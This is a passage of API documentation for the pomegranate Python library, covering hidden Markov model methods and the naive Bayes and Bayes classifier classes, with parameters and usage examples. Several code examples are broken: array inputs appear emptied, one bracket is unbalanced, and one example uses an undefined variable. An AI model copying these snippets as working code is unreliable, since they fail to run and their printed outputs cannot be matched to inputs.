‘labeled’ The training algorithm to use. Baum-Welch uses the forward-backward algorithm to train using a version of structured EM. Viterbi iteratively runs the sequences through the Viterbi algorithm and then uses hard assignments of observations to states using that. Default is ‘baum-welch’. Labeled training requires that labels are provided for each observation in each sequence. inertia : double or None, optional, range [0, 1] If double, will set both edge_inertia and distribution_inertia to be that value. If None, will not override those values. Default is None. edge_inertia : bool, optional, range [0, 1] Whether to use inertia when updating the transition probability parameters. Default is 0.0. distribution_inertia : double, optional, range [0, 1] Whether to use inertia when updating the distribution parameters. Default is 0.0. pseudocount : double, optional A pseudocount to add to both transitions and emissions. If supplied, it will override both transition_pseudocount and emission_pseudocount in the same way that specifying inertia will override both edge_inertia and distribution_inertia. Default is None. transition_pseudocount : double, optional A pseudocount to add to all transitions to add a prior to the MLE estimate of the transition probability. Default is 0. emission_pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Only effects hidden Markov models defined over discrete distributions. Default is 0. use_pseudocount : bool, optional Whether to use the pseudocounts defined in the add_edge method for edge-specific pseudocounts when updating the transition probability parameters. Does not effect the transition_pseudocount and emission_pseudocount parameters, but can be used in addition to them. Default is False. stop_threshold : double, optional The threshold the improvement ratio of the models log probability in fitting the scores. Default is 1e-9. min_iterations : int, optional The minimum number of iterations to run Baum-Welch training for. Default is 0. max_iterations : int, optional The maximum number of iterations to run Baum-Welch training for. Default is 1e8. n_init : int, optional The number of times to initialize the k-means clustering before taking the best value. Default is 1. init : str, optional The initialization method for kmeans. Must be one of ‘first-k’, ‘random’, ‘kmeans++’, or ‘kmeans||’. Default is kmeans++. max_kmeans_iterations : int, optional The number of iterations to run k-means for before starting EM. initialization_batch_size : int or None, optional The number of batches to use to initialize the model. None means use the entire data set. Default is None. batches_per_epoch : int or None, optional The number of batches in an epoch. This is the number of batches to summarize before calling from_summaries and updating the model parameters. This allows one to do minibatch updates by updating the model parameters before setting the full dataset. If set to None, uses the full dataset. Default is None. lr_decay : double, optional, positive The step size decay as a function of the number of iterations. Functionally, this sets the inertia to be (2+k)^{-lr_decay} where k is the number of iterations. This causes initial iterations to have more of an impact than later iterations, and is frequently used in minibatch learning. This value is suggested to be between 0.5 and 1. Default is 0, meaning no decay. end_state : bool, optional Whether to calculate the probability of ending in each state or not. Default is False. state_names : array-like, shape (n_states), optional The name of the states. If None is passed in, default names are generated. Default is None name : str, optional The name of the model. Default is None random_state : int, numpy.random.RandomState, or None The random state used for generating samples. If set to none, a random seed will be used. If set to either an integer or a random seed, will produce deterministic outputs. callbacks : list, optional A list of callback objects that describe functionality that should be undertaken over the course of training. return_history : bool, optional Whether to return the history during training as well as the model. verbose : bool, optional Whether to print the improvement in the model fitting at each iteration. Default is True. n_jobs : int, optional The number of threads to use when performing training. This leads to exact updates. Default is 1. model : HiddenMarkovModel The model fit to the data.\nfrom_summaries()\n\nFit the model to the stored summary statistics.\n\nParameters: inertia : double or None, optional The inertia to use for both edges and distributions without needing to set both of them. If None, use the values passed in to those variables. Default is None. pseudocount : double, optional A pseudocount to add to both transitions and emissions. If supplied, it will override both transition_pseudocount and emission_pseudocount in the same way that specifying inertia will override both edge_inertia and distribution_inertia. Default is None. transition_pseudocount : double, optional A pseudocount to add to all transitions to add a prior to the MLE estimate of the transition probability. Default is 0. emission_pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Only effects hidden Markov models defined over discrete distributions. Default is 0. use_pseudocount : bool, optional Whether to use the pseudocounts defined in the add_edge method for edge-specific pseudocounts when updating the transition probability parameters. Does not effect the transition_pseudocount and emission_pseudocount parameters, but can be used in addition to them. Default is False. edge_inertia : bool, optional, range [0, 1] Whether to use inertia when updating the transition probability parameters. Default is 0.0. distribution_inertia : double, optional, range [0, 1] Whether to use inertia when updating the distribution parameters. Default is 0.0. None\nfrom_yaml()\n\nDeserialize this object from its YAML representation.\n\nlog_probability()\n\nCalculate the log probability of a single sequence.\n\nIf a path is provided, calculate the log probability of that sequence given the path.\n\nParameters: sequence : array-like Return the array of observations in a single sequence of data check_input : bool, optional Check to make sure that all emissions fall under the support of the emission distributions. Default is True. logp : double The log probability of the sequence\nmaximum_a_posteriori()\n\nRun posterior decoding on the sequence.\n\nMAP decoding is an alternative to viterbi decoding, which returns the most likely state for each observation, based on the forward-backward algorithm. This is also called posterior decoding. This method is described on p. 14 of http://ai.stanford.edu/~serafim/CS262_2007/ notes/lecture5.pdf\n\nWARNING: This may produce impossible sequences.\n\nParameters: sequence : array-like An array (or list) of observations. logp : double The log probability of the sequence under the Viterbi path path : list of tuples Tuples of (state index, state object) of the states along the posterior path.\nnode_count()\n\nReturns the number of nodes/states in the model\n\nplot()\n\nDraw this model’s graph using NetworkX and matplotlib.\n\nNote that this relies on networkx’s built-in graphing capabilities (and not Graphviz) and thus can’t draw self-loops.\n\nSee networkx.draw_networkx() for the keywords you can pass in.\n\nParameters: precision : int, optional The precision with which to round edge probabilities. Default is 4. **kwargs : any The arguments to pass into networkx.draw_networkx() None\npredict()\n\nCalculate the most likely state for each observation.\n\nThis can be either the Viterbi algorithm or maximum a posteriori. It returns the probability of the sequence under that state sequence and the actual state sequence.\n\nThis is a sklearn wrapper for the Viterbi and maximum_a_posteriori methods.\n\nParameters: sequence : array-like An array (or list) of observations. algorithm : “map”, “viterbi” The algorithm with which to decode the sequence path : list of integers A list of the ids of states along the MAP or the Viterbi path.\npredict_log_proba()\n\nCalculate the state log probabilities for each observation in the sequence.\n\nRun the forward-backward algorithm on the sequence and return the emission matrix. This is the log normalized probability that each each state generated that emission given both the symbol and the entire sequence.\n\nThis is a sklearn wrapper for the forward backward algorithm.\n\n• Forward and backward algorithm implementations. A comprehensive\n\ndescription of the forward, backward, and forward-background algorithm is here: http://en.wikipedia.org/wiki/Forward%E2%80%93backward_algorithm\n\nParameters: sequence : array-like An array (or list) of observations. emissions : array-like, shape (len(sequence), n_nonsilent_states) The log normalized probabilities of each state generating each emission.\npredict_proba()\n\nCalculate the state probabilities for each observation in the sequence.\n\nRun the forward-backward algorithm on the sequence and return the emission matrix. This is the normalized probability that each each state generated that emission given both the symbol and the entire sequence.\n\nThis is a sklearn wrapper for the forward backward algorithm.\n\n• Forward and backward algorithm implementations. A comprehensive\n\ndescription of the forward, backward, and forward-background algorithm is here: http://en.wikipedia.org/wiki/Forward%E2%80%93backward_algorithm\n\nParameters: sequence : array-like An array (or list) of observations. emissions : array-like, shape (len(sequence), n_nonsilent_states) The normalized probabilities of each state generating each emission.\nprobability()\n\nReturn the probability of the given symbol under this distribution.\n\nParameters: symbol : object The symbol to calculate the probability of probability : double The probability of that point under the distribution.\nsample()\n\nGenerate a sequence from the model.\n\nReturns the sequence generated, as a list of emitted items. The model must have been baked first in order to run this method.\n\nIf a length is specified and the HMM is infinite (no edges to the end state), then that number of samples will be randomly generated. If the length is specified and the HMM is finite, the method will attempt to generate a prefix of that length. Currently it will force itself to not take an end transition unless that is the only path, making it not a true random sample on a finite model.\n\nWARNING: If the HMM has no explicit end state, must specify a length to use.\n\nParameters: n : int or None, optional The number of samples to generate. If None, return only one sample. length : int, optional Generate a sequence with a maximal length of this size. Used if you have no explicit end state. Default is 0. path : bool, optional Return the path of hidden states in addition to the emissions. If true will return a tuple of (sample, path). Default is False. random_state : int, numpy.random.RandomState, or None The random state used for generating samples. If set to none, a random seed will be used. If set to either an integer or a random seed, will produce deterministic outputs. sample : list or tuple If path is true, return a tuple of (sample, path), otherwise return just the samples.\nscore()\n\nReturn the accuracy of the model on a data set.\n\nParameters: X : numpy.ndarray, shape=(n, d) The values of the data set y : numpy.ndarray, shape=(n,) The labels of each value\nstate_count()\n\nReturns the number of states present in the model.\n\nsummarize()\n\nSummarize data into stored sufficient statistics for out-of-core training. Only implemented for Baum-Welch training since Viterbi is less memory intensive.\n\nParameters: sequences : array-like An array of some sort (list, numpy.ndarray, tuple..) of sequences, where each sequence is a numpy array, which is 1 dimensional if the HMM is a one dimensional array, or multidimensional if the HMM supports multiple dimensions. weights : array-like or None, optional An array of weights, one for each sequence to train on. If None, all sequences are equally weighted. Default is None. labels : array-like or None, optional An array of state labels for each sequence. This is only used in ‘labeled’ training. If used this must be comprised of n lists where n is the number of sequences to train on, and each of those lists must have one label per observation. Default is None. algorithm : ‘baum-welch’, ‘viterbi’, ‘labeled’ The training algorithm to use. Baum-Welch uses the forward-backward algorithm to train using a version of structured EM. Viterbi iteratively runs the sequences through the Viterbi algorithm and then uses hard assignments of observations to states using that. Default is ‘baum-welch’. Labeled training requires that labels are provided for each observation in each sequence. check_input : bool, optional Check the input. This casts the input sequences as numpy arrays, and converts non-numeric inputs into numeric inputs for faster processing later. Default is True. logp : double The log probability of the sequences.\nthaw()\n\nThaw the distribution, re-allowing updates to occur.\n\nthaw_distributions()\n\nThaw all distributions in the model.\n\nUpon training distributions will be updated again.\n\nParameters: None None\nto_json()\n\nSerialize the model to a JSON.\n\nParameters: separators : tuple, optional The two separators to pass to the json.dumps function for formatting. indent : int, optional The indentation to use at each level. Passed to json.dumps for formatting. json : str A properly formatted JSON object.\nto_yaml()\n\nSerialize the model to YAML for compactness.\n\nviterbi()\n\nRun the Viteri algorithm on the sequence.\n\nRun the Viterbi algorithm on the sequence given the model. This finds the ML path of hidden states given the sequence. Returns a tuple of the log probability of the ML path, or (-inf, None) if the sequence is impossible under the model. If a path is returned, it is a list of tuples of the form (sequence index, state object).\n\nThis is fundamentally the same as the forward algorithm using max instead of sum, except the traceback is more complicated, because silent states in the current step can trace back to other silent states in the current step as well as states in the previous step.\n\n• Viterbi implementation described well in the wikipedia article\n\nhttp://en.wikipedia.org/wiki/Viterbi_algorithm\n\nParameters: sequence : array-like An array (or list) of observations. logp : double The log probability of the sequence under the Viterbi path path : list of tuples Tuples of (state index, state object) of the states along the Viterbi path.\n\n## Bayes Classifiers and Naive Bayes¶\n\nIPython Notebook Tutorial\n\nBayes classifiers are simple probabilistic classification models based off of Bayes theorem. See the above tutorial for a full primer on how they work, and what the distinction between a naive Bayes classifier and a Bayes classifier is. Essentially, each class is modeled by a probability distribution and classifications are made according to what distribution fits the data the best. They are a supervised version of general mixture models, in that the predict, predict_proba, and predict_log_proba methods return the same values for the same underlying distributions, but that instead of using expectation-maximization to fit to new data they can use the provided labels directly.\n\n### Initialization¶\n\nBayes classifiers and naive Bayes can both be initialized in one of two ways depending on if you know the parameters of the model beforehand or not, (1) passing in a list of pre-initialized distributions to the model, or (2) using the from_samples class method to initialize the model directly from data. For naive Bayes models on multivariate data, the pre-initialized distributions must be a list of IndependentComponentDistribution objects since each dimension is modeled independently from the others. For Bayes classifiers on multivariate data a list of any type of multivariate distribution can be provided. For univariate data the two models produce identical results, and can be passed in a list of univariate distributions. For example:\n\nfrom pomegranate import *\nd1 = IndependentComponentsDistribution([NormalDistribution(5, 2), NormalDistribution(6, 1), NormalDistribution(9, 1)])\nd2 = IndependentComponentsDistribution([NormalDistribution(2, 1), NormalDistribution(8, 1), NormalDistribution(5, 1)])\nd3 = IndependentComponentsDistribution([NormalDistribution(3, 1), NormalDistribution(5, 3), NormalDistribution(4, 1)])\nmodel = NaiveBayes([d1, d2, d3])\n\n\nwould create a three class naive Bayes classifier that modeled data with three dimensions. Alternatively, we can initialize a Bayes classifier in the following manner\n\nfrom pomegranate import *\nd1 = MultivariateGaussianDistribution([5, 6, 9], [[2, 0, 0], [0, 1, 0], [0, 0, 1]])\nd2 = MultivariateGaussianDistribution([2, 8, 5], [[1, 0, 0], [0, 1, 0], [0, 0, 1]])\nd3 = MultivariateGaussianDistribution([3, 5, 4], [[1, 0, 0], [0, 3, 0], [0, 0, 1]])\nmodel = BayesClassifier([d1, d2, d3])\n\n\nThe two examples above functionally create the same model, as the Bayes classifier uses multivariate Gaussian distributions with the same means and a diagonal covariance matrix containing only the variances. However, if we were to fit these models to data later on, the Bayes classifier would learn a full covariance matrix while the naive Bayes would only learn the diagonal.\n\nIf we instead wish to initialize our model directly onto data, we use the from_samples class method.\n\nfrom pomegranate import *\nimport numpy\nmodel = NaiveBayes.from_samples(NormalDistribution, X, y)\n\n\nThis would create a naive Bayes model directly from the data with normal distributions modeling each of the dimensions, and a number of components equal to the number of classes in y. Alternatively if we wanted to create a model with different distributions for each dimension we can do the following:\n\n>>> model = NaiveBayes.from_samples([NormalDistribution, ExponentialDistribution], X, y)\n\n\nThis assumes that your data is two dimensional and that you want to model the first distribution as a normal distribution and the second dimension as an exponential distribution.\n\nWe can do pretty much the same thing with Bayes classifiers, except passing in a more complex model.\n\n>>> model = BayesClassifier.from_samples(MultivariateGaussianDistribution, X, y)\n\n\nOne can use much more complex models than just a multivariate Gaussian with a full covariance matrix when using a Bayes classifier. Specifically, you can also have your distributions be general mixture models, hidden Markov models, and Bayesian networks. For example:\n\n>>> model = BayesClassifier.from_samples(BayesianNetwork, X, y)\n\n\nThat would require that the data is only discrete valued currently, and the structure learning task may be too long if not set appropriately. However, it is possible. Currently, one cannot simply put in GeneralMixtureModel or HiddenMarkovModel despite them having a from_samples method because there is a great deal of flexibility in terms of the structure or emission distributions. The easiest way to set up one of these more complex models is to build each of the components separately and then feed them into the Bayes classifier method using the first initialization method.\n\n>>> d1 = GeneralMixtureModel.from_samples(MultivariateGaussianDistribution, n_components=5, X=X[y==0])\n>>> d2 = GeneralMixtureModel.from_samples(MultivariateGaussianDistribution, n_components=5, X=X[y==1])\n>>> model = BayesClassifier([d1, d2])\n\n\n### Prediction¶\n\nBayes classifiers and naive Bayes supports the same three prediction methods that the other models support, predict, predict_proba, and predict_log_proba. These methods return the most likely class given the data (argmax_m P(M|D)), the probability of each class given the data (P(M|D)), and the log probability of each class given the data (log P(M|D)). It is best to always pass in a 2D matrix even for univariate data, where it would have a shape of (n, 1).\n\nThe predict method takes in samples and returns the most likely class given the data.\n\nfrom pomegranate import *\nmodel = NaiveBayes([NormalDistribution(5, 2), UniformDistribution(0, 10), ExponentialDistribution(1.0)])\nmodel.predict( np.array([, , , , ]))\n[2, 2, 2, 0, 0]\n\n\nCalling predict_proba on five samples for a Naive Bayes with univariate components would look like the following.\n\nfrom pomegranate import *\nmodel = NaiveBayes([NormalDistribution(5, 2), UniformDistribution(0, 10), ExponentialDistribution(1)])\nmodel.predict_proba(np.array([, , , , ]))\n[[ 0.00790443 0.09019051 0.90190506]\n[ 0.05455011 0.20207126 0.74337863]\n[ 0.21579499 0.33322883 0.45097618]\n[ 0.44681566 0.36931382 0.18387052]\n[ 0.59804205 0.33973357 0.06222437]]\n\n\nMultivariate models work the same way.\n\nfrom pomegranate import *\nd1 = MultivariateGaussianDistribution([5, 5], [[1, 0], [0, 1]])\nd2 = IndependentComponentsDistribution([NormalDistribution(5, 2), NormalDistribution(5, 2)])\nmodel = BayesClassifier([d1, d2])\nclf.predict_proba(np.array([[0, 4],\n[1, 3],\n[2, 2],\n[3, 1],\n[4, 0]]))\narray([[ 0.00023312, 0.99976688],\n[ 0.00220745, 0.99779255],\n[ 0.00466169, 0.99533831],\n[ 0.00220745, 0.99779255],\n[ 0.00023312, 0.99976688]])\n\n\npredict_log_proba works the same way, returning the log probabilities instead of the probabilities.\n\n### Fitting¶\n\nBoth naive Bayes and Bayes classifiers also have a fit method that updates the parameters of the model based on new data. The major difference between these methods and the others presented is that these are supervised methods and so need to be passed labels in addition to data. This change propagates also to the summarize method, where labels are provided as well.\n\nfrom pomegranate import *\nd1 = MultivariateGaussianDistribution([5, 5], [[1, 0], [0, 1]])\nd2 = IndependentComponentsDistribution(NormalDistribution(5, 2), NormalDistribution(5, 2)])\nmodel = BayesClassifier([d1, d2])\nX = np.array([[6.0, 5.0],\n[3.5, 4.0],\n[7.5, 1.5],\n[7.0, 7.0 ]])\ny = np.array([0, 0, 1, 1])\nmodel.fit(X, y)\n\n\nAs we can see, there are four samples, with the first two samples labeled as class 0 and the last two samples labeled as class 1. Keep in mind that the training samples must match the input requirements for the models used. So if using a univariate distribution, then each sample must contain one item. A bivariate distribution, two. For hidden markov models, the sample can be a list of observations of any length. An example using hidden markov models would be the following.\n\nd1 = HiddenMarkovModel...\nd2 = HiddenMarkovModel...\nd3 = HiddenMarkovModel...\nmodel = BayesClassifier([d1, d2, d3])\nX = np.array([list('HHHHHTHTHTTTTH'),\nlist('HHTHHTTHHHHHTH'),\nlist('TH'),\nlist('HHHHT')])\ny = np.array([2, 2, 1, 0])\nmodel.fit(X, y)\n\n\n### API Reference¶\n\nclass pomegranate.NaiveBayes.NaiveBayes\n\nA naive Bayes model, a supervised alternative to GMM.\n\nA naive Bayes classifier, that treats each dimension independently from each other. This is a simpler version of the Bayes Classifier, that can use any distribution with any covariance structure, including Bayesian networks and hidden Markov models.\n\nParameters: models : list A list of initialized distributions. weights : list or numpy.ndarray or None, default None The prior probabilities of the components. If None is passed in then defaults to the uniformly distributed priors.\n\nExamples\n\n>>> from pomegranate import *\n>>> X = [0, 2, 0, 1, 0, 5, 6, 5, 7, 6]\n>>> y = [0, 0, 0, 0, 0, 1, 1, 0, 1, 1]\n>>> clf = NaiveBayes.from_samples(NormalDistribution, X, y)\n>>> clf.predict_proba()\narray([[0.01973451, 0.98026549]])\n\n>>> from pomegranate import *\n>>> clf = NaiveBayes([NormalDistribution(1, 2), NormalDistribution(0, 1)])\n>>> clf.predict_log_proba([, , , [-1]])\narray([[-1.1836569 , -0.36550972],\n[-0.79437677, -0.60122959],\n[-0.26751248, -1.4493653],\n[-1.09861229, -0.40546511]])\n\nAttributes: models : list The model objects, either initialized by the user or fit to data. weights : numpy.ndarray The prior probability of each component of the model.\nclear_summaries()\n\nRemove the stored sufficient statistics.\n\nParameters: None None\ncopy()\n\nReturn a deep copy of this distribution object.\n\nThis object will not be tied to any other distribution or connected in any form.\n\nParameters: None distribution : Distribution A copy of the distribution with the same parameters.\nfit()\n\nFit the Bayes classifier to the data by passing data to its components.\n\nThe fit step for a Bayes classifier with purely labeled data is a simple MLE update on the underlying distributions, grouped by the labels. However, in the semi-supervised the model is trained on a mixture of both labeled and unlabeled data, where the unlabeled data uses the label -1. In this setting, EM is used to train the model. The model is initialized using the labeled data and then sufficient statistics are gathered for both the labeled and unlabeled data, combined, and used to update the parameters.\n\nParameters: X : numpy.ndarray or list The dataset to operate on. For most models this is a numpy array with columns corresponding to features and rows corresponding to samples. For markov chains and HMMs this will be a list of variable length sequences. y : numpy.ndarray or list or None Data labels for supervised training algorithms. weights : array-like or None, shape (n_samples,), optional The initial weights of each sample in the matrix. If nothing is passed in then each sample is assumed to be the same weight. Default is None. inertia : double, optional Inertia used for the training the distributions. pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Default is 0. stop_threshold : double, optional, positive The threshold at which EM will terminate for the improvement of the model. If the model does not improve its fit of the data by a log probability of 0.1 then terminate. Only required if doing semisupervised learning. Default is 0.1. max_iterations : int, optional, positive The maximum number of iterations to run EM for. If this limit is hit then it will terminate training, regardless of how well the model is improving per iteration. Only required if doing semisupervised learning. Default is 1e8. callbacks : list, optional A list of callback objects that describe functionality that should be undertaken over the course of training. Only used for semi-supervised learning. return_history : bool, optional Whether to return the history during training as well as the model. Only used for semi-supervised learning. verbose : bool, optional Whether or not to print out improvement information over iterations. Only required if doing semisupervised learning. Default is False. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. self : object Returns the fitted model\nfreeze()\n\nFreeze the distribution, preventing updates from occurring.\n\nfrom_samples()\n\nCreate a naive Bayes classifier directly from the given dataset.\n\nThis will initialize the distributions using maximum likelihood estimates derived by partitioning the dataset using the label vector. If any labels are missing, the model will be trained using EM in a semi-supervised setting.\n\nA homogeneous model can be defined by passing in a single distribution callable as the first parameter and specifying the number of components, while a heterogeneous model can be defined by passing in a list of callables of the appropriate type.\n\nA naive Bayes classifier is a subrset of the Bayes classifier in that the math is identical, but the distributions are independent for each feature. Simply put, one can create a multivariate Gaussian Bayes classifier with a full covariance matrix, but a Gaussian naive Bayes would require a diagonal covariance matrix.\n\nParameters: distributions : array-like, shape (n_components,) or callable The components of the model. This should either be a single callable if all components will be the same distribution, or an array of callables, one for each feature. X : array-like or generator, shape (n_samples, n_dimensions) This is the data to train on. Each row is a sample, and each column is a dimension to train on. y : array-like, shape (n_samples,) The labels for each sample. The labels should be integers between 0 and k-1 for a problem with k classes, or -1 if the label is not known for that sample. weights : array-like, shape (n_samples,), optional The initial weights of each sample in the matrix. If nothing is passed in then each sample is assumed to be the same weight. Default is None. pseudocount : double, optional, positive A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Only effects mixture models defined over discrete distributions. Default is 0. stop_threshold : double, optional, positive The threshold at which EM will terminate for the improvement of the model. If the model does not improve its fit of the data by a log probability of 0.1 then terminate. Only required if doing semisupervised learning. Default is 0.1. max_iterations : int, optional, positive The maximum number of iterations to run EM for. If this limit is hit then it will terminate training, regardless of how well the model is improving per iteration. Only required if doing semisupervised learning. Default is 1e8. callbacks : list, optional A list of callback objects that describe functionality that should be undertaken over the course of training. return_history : bool, optional Whether to return the history during training as well as the model. verbose : bool, optional Whether or not to print out improvement information over iterations. Only required if doing semisupervised learning. Default is False. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. Default is 1. model : NaiveBayes The fit naive Bayes model.\nfrom_summaries()\n\nFit the model to the collected sufficient statistics.\n\nFit the parameters of the model to the sufficient statistics gathered during the summarize calls. This should return an exact update.\n\nParameters: inertia : double, optional The weight of the previous parameters of the model. The new parameters will roughly be old_param*inertia + new_param*(1-inertia), so an inertia of 0 means ignore the old parameters, whereas an inertia of 1 means ignore the new parameters. Default is 0.0. pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. If discrete data, will smooth both the prior probabilities of each component and the emissions of each component. Otherwise, will only smooth the prior probabilities of each component. Default is 0. None\nfrom_yaml()\n\nDeserialize this object from its YAML representation.\n\nlog_probability()\n\nCalculate the log probability of a point under the distribution.\n\nThe probability of a point is the sum of the probabilities of each distribution multiplied by the weights. Thus, the log probability is the sum of the log probability plus the log prior.\n\nThis is the python interface.\n\nParameters: X : numpy.ndarray, shape=(n, d) or (n, m, d) The samples to calculate the log probability of. Each row is a sample and each column is a dimension. If emissions are HMMs then shape is (n, m, d) where m is variable length for each observation, and X becomes an array of n (m, d)-shaped arrays. n_jobs : int, optional The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. batch_size: int or None, optional The size of the batches to make predictions on. Passing in None means splitting the data set evenly among the number of jobs. Default is None. log_probability : double The log probability of the point under the distribution.\npredict()\n\nPredict the most likely component which generated each sample.\n\nCalculate the posterior P(M|D) for each sample and return the index of the component most likely to fit it. This corresponds to a simple argmax over the responsibility matrix.\n\nThis is a sklearn wrapper for the maximum_a_posteriori method.\n\nParameters: X : array-like, shape (n_samples, n_dimensions) The samples to do the prediction on. Each sample is a row and each column corresponds to a dimension in that sample. For univariate distributions, a single array may be passed in. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. batch_size: int or None, optional The size of the batches to make predictions on. Passing in None means splitting the data set evenly among the number of jobs. Default is None. y : array-like, shape (n_samples,) The predicted component which fits the sample the best.\npredict_log_proba()\n\nCalculate the posterior log P(M|D) for data.\n\nCalculate the log probability of each item having been generated from each component in the model. This returns normalized log probabilities such that the probabilities should sum to 1\n\nThis is a sklearn wrapper for the original posterior function.\n\nParameters: X : array-like, shape (n_samples, n_dimensions) The samples to do the prediction on. Each sample is a row and each column corresponds to a dimension in that sample. For univariate distributions, a single array may be passed in. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. batch_size: int or None, optional The size of the batches to make predictions on. Passing in None means splitting the data set evenly among the number of jobs. Default is None. y : array-like, shape (n_samples, n_components) The normalized log probability log P(M|D) for each sample. This is the probability that the sample was generated from each component.\npredict_proba()\n\nCalculate the posterior P(M|D) for data.\n\nCalculate the probability of each item having been generated from each component in the model. This returns normalized probabilities such that each row should sum to 1.\n\nSince calculating the log probability is much faster, this is just a wrapper which exponentiates the log probability matrix.\n\nParameters: X : array-like, shape (n_samples, n_dimensions) The samples to do the prediction on. Each sample is a row and each column corresponds to a dimension in that sample. For univariate distributions, a single array may be passed in. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. batch_size: int or None, optional The size of the batches to make predictions on. Passing in None means splitting the data set evenly among the number of jobs. Default is None. probability : array-like, shape (n_samples, n_components) The normalized probability P(M|D) for each sample. This is the probability that the sample was generated from each component.\nprobability()\n\nReturn the probability of the given symbol under this distribution.\n\nParameters: symbol : object The symbol to calculate the probability of probability : double The probability of that point under the distribution.\nsample()\n\nGenerate a sample from the model.\n\nFirst, randomly select a component weighted by the prior probability, Then, use the sample method from that component to generate a sample.\n\nParameters: n : int, optional The number of samples to generate. Defaults to 1. random_state : int, numpy.random.RandomState, or None The random state used for generating samples. If set to none, a random seed will be used. If set to either an integer or a random seed, will produce deterministic outputs. sample : array-like or object A randomly generated sample from the model of the type modelled by the emissions. An integer if using most distributions, or an array if using multivariate ones, or a string for most discrete distributions. If n=1 return an object, if n>1 return an array of the samples.\nscore()\n\nReturn the accuracy of the model on a data set.\n\nParameters: X : numpy.ndarray, shape=(n, d) The values of the data set y : numpy.ndarray, shape=(n,) The labels of each value\nsummarize()\n\nSummarize data into stored sufficient statistics for out-of-core training.\n\nParameters: X : array-like, shape (n_samples, variable) Array of the samples, which can be either fixed size or variable depending on the underlying components. y : array-like, shape (n_samples,) Array of the known labels as integers weights : array-like, shape (n_samples,) optional Array of the weight of each sample, a positive float None\nthaw()\n\nThaw the distribution, re-allowing updates to occur.\n\nto_json()\n\nSerialize the model to JSON.\n\nParameters: separators : tuple, optional The two separators to pass to the json.dumps function for formatting. Default is (‘,’, ‘ : ‘). indent : int, optional The indentation to use at each level. Passed to json.dumps for formatting. Default is 4. json : str A properly formatted JSON object.\nto_yaml()\n\nSerialize the model to YAML for compactness.\n\nclass pomegranate.BayesClassifier.BayesClassifier\n\nA Bayes classifier, a more general form of a naive Bayes classifier.\n\nA Bayes classifier, like a naive Bayes classifier, uses Bayes’ rule in order to calculate the posterior probability of the classes, which are used for the predictions. However, a naive Bayes classifier assumes that each of the features are independent of each other and so can be modelled as independent distributions. A generalization of that, the Bayes classifier, allows for an arbitrary covariance between the features. This allows for more complicated components to be used, up to and including even HMMs to form a classifier over sequences, or mixtures to form a classifier with complex emissions.\n\nParameters: models : list A list of initialized distribution objects to use as the components in the model. weights : list or numpy.ndarray or None, default None The prior probabilities of the components. If None is passed in then defaults to the uniformly distributed priors.\n\nExamples\n\n>>> from pomegranate import *\n>>>\n>>> d1 = NormalDistribution(3, 2)\n>>> d2 = NormalDistribution(5, 1.5)\n>>>\n>>> clf = BayesClassifier([d1, d2])\n>>> clf.predict_proba([])\narray([[ 0.2331767, 0.7668233]])\n>>> X = [, , , , , , , , , ]\n>>> y = [0, 0, 0, 0, 0, 1, 1, 0, 1, 1]\n>>> clf.fit(X, y)\n>>> clf.predict_proba([])\narray([[ 0.01973451, 0.98026549]])\n\nAttributes: models : list The model objects, either initialized by the user or fit to data. weights : numpy.ndarray The prior probability of each component of the model.\nclear_summaries()\n\nRemove the stored sufficient statistics.\n\nParameters: None None\ncopy()\n\nReturn a deep copy of this distribution object.\n\nThis object will not be tied to any other distribution or connected in any form.\n\nParameters: None distribution : Distribution A copy of the distribution with the same parameters.\nfit()\n\nFit the Bayes classifier to the data by passing data to its components.\n\nThe fit step for a Bayes classifier with purely labeled data is a simple MLE update on the underlying distributions, grouped by the labels. However, in the semi-supervised the model is trained on a mixture of both labeled and unlabeled data, where the unlabeled data uses the label -1. In this setting, EM is used to train the model. The model is initialized using the labeled data and then sufficient statistics are gathered for both the labeled and unlabeled data, combined, and used to update the parameters.\n\nParameters: X : numpy.ndarray or list The dataset to operate on. For most models this is a numpy array with columns corresponding to features and rows corresponding to samples. For markov chains and HMMs this will be a list of variable length sequences. y : numpy.ndarray or list or None Data labels for supervised training algorithms. weights : array-like or None, shape (n_samples,), optional The initial weights of each sample in the matrix. If nothing is passed in then each sample is assumed to be the same weight. Default is None. inertia : double, optional Inertia used for the training the distributions. pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Default is 0. stop_threshold : double, optional, positive The threshold at which EM will terminate for the improvement of the model. If the model does not improve its fit of the data by a log probability of 0.1 then terminate. Only required if doing semisupervised learning. Default is 0.1. max_iterations : int, optional, positive The maximum number of iterations to run EM for. If this limit is hit then it will terminate training, regardless of how well the model is improving per iteration. Only required if doing semisupervised learning. Default is 1e8. callbacks : list, optional A list of callback objects that describe functionality that should be undertaken over the course of training. Only used for semi-supervised learning. return_history : bool, optional Whether to return the history during training as well as the model. Only used for semi-supervised learning. verbose : bool, optional Whether or not to print out improvement information over iterations. Only required if doing semisupervised learning. Default is False. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. self : object Returns the fitted model\nfreeze()\n\nFreeze the distribution, preventing updates from occurring.\n\nfrom_samples()\n\nCreate a Bayes classifier directly from the given dataset.\n\nThis will initialize the distributions using maximum likelihood estimates derived by partitioning the dataset using the label vector. If any labels are missing, the model will be trained using EM in a semi-supervised setting.\n\nA homogeneous model can be defined by passing in a single distribution callable as the first parameter and specifying the number of components, while a heterogeneous model can be defined by passing in a list of callables of the appropriate type.\n\nA Bayes 